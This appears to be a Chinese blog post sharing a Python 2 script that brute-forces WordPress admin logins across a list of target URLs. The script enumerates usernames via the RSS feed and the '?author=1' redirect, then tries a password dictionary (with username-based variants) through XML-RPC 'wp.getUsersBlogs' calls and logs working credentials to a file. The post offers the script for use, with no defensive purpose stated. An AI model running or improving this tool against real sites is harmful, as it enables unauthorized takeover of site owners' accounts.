版本等待解决的问题:
1. 如果当前xmlrpc.php不可用,还是会继续爆破,不会终止爆破当前的URL
2. 如果网站超时,不会终止,会继续for循环掉当前字典
3. 单线程问题,速度比较慢
4. 还没想到

爆破当前目录的test_url.txt里面的url,密码字典为pass.txt,
test_url.txt格式为:

http://www.baidu.com/
http://www.ansbase5.org

密码字典格式为:

~
%123
%456
%789
%111
%222
%333
%666
%888
%123456
123456
123654
%123654
123123
%123123
123456789
%123456789
qweasdzxc
%qweasdzxc
abcde123
%abcde123
%abcd

字典中的%为用户名变量。~为用户名。

#!/usr/bin/env python
#coding:utf-8
# __author__ = 'IversOn5'

import requests
import re
import threading



def get_author(url):

   get_url0 = url + "?feed=rss2"
   get_url1 = url + "?author=1"
   headers = {
      'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
   }
   #print url
   try:
      res0 = requests.get(get_url0,headers=headers,timeout=3)
      res1 = requests.get(get_url1,headers=headers,timeout=3)
      html0 = res0.content
      html1 = res1.content
      s0 = re.findall('<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>',html0)
      s1 = re.findall('<title>(.*?)\s',html1)
      if len(s1) == 0:
         # print "null"
         # print res.url
         s1 = re.findall('author/(.*?)/', res1.url)
      s = s0 + s1 
      #print "The Username maybs1e:",s
      if not s:
         s.append("admin")
      u = list(set(s))
      #print u
      return u
      #for i in list(set(s)):
         #print i

   except Exception, e:
      print e
      return False



def crack_xmlrpc(username, password, url):
   global counter
   counter = 0
   if not url.endswith('/'):
      crack_url = url + "/xmlrpc.php"
   else:
      crack_url = url + "xmlrpc.php"
   if ',' in username:
      username = username[0:-1]

   if '%' in password:
      password = username+password[1:]
   if '~' in password:
      password = username
   print username+"  "+password
   post = '''
      <?xml version="1.0" encoding="iso-8859-1"?>
      <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
          <param><value>''' + username + '''</value></param>
          <param><value>''' + password + '''</value></param>
      </params>
      </methodCall>'''
   headers = {
      'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
      'Referer': crack_url
   }
   try:
      res = requests.post(url=crack_url, data=post, headers=headers, timeout=3).content
      #print "ok"
   except Exception, e:
      counter = counter + 1
      if counter >=3:
         return "failed"
      print "error", e

   else:
      if '<int>405</int>' in res:
         print "XML-RPC has been disabled. Please use the wp-admin.php"
      elif "faultCode" in res:
         pass
         #print "The password is not:", password
      elif "isAdmin" in res:
         print "\nThe password is ", password
         with open('success_wp_test.txt','a') as suc:
            suc.write(url+" -- "+username+"  "+password+"\n")
         return "success"



def main(password):

   for url in urls:
      print "Checking "+url+" username"
      username = get_author(url)
      if username:
         break_flag = False
         for u in username:
            u = u.strip()
            if break_flag:
               break
            if len(u) >= 2:#只有当用户名大于1位才爆破,避免爆破空账号
               for p in password:
                  single = crack_xmlrpc(u,p,url)
                  if single == "success":
                     break
                  if single == "failed":
                     break_flag = True
                     break




if __name__ == '__main__':
   urls = []
   for i in open('test_urL.txt','r').readlines():
      if "https" not in i:
         urls.append(i.strip())
   print "loaded urls"
   passwordx = [i.strip() for i in open('pass.txt','r').readlines()]
   print "loaded passowrd"
   main(passwordx)

发表评论

电子邮件地址不会被公开。 必填项已用*标注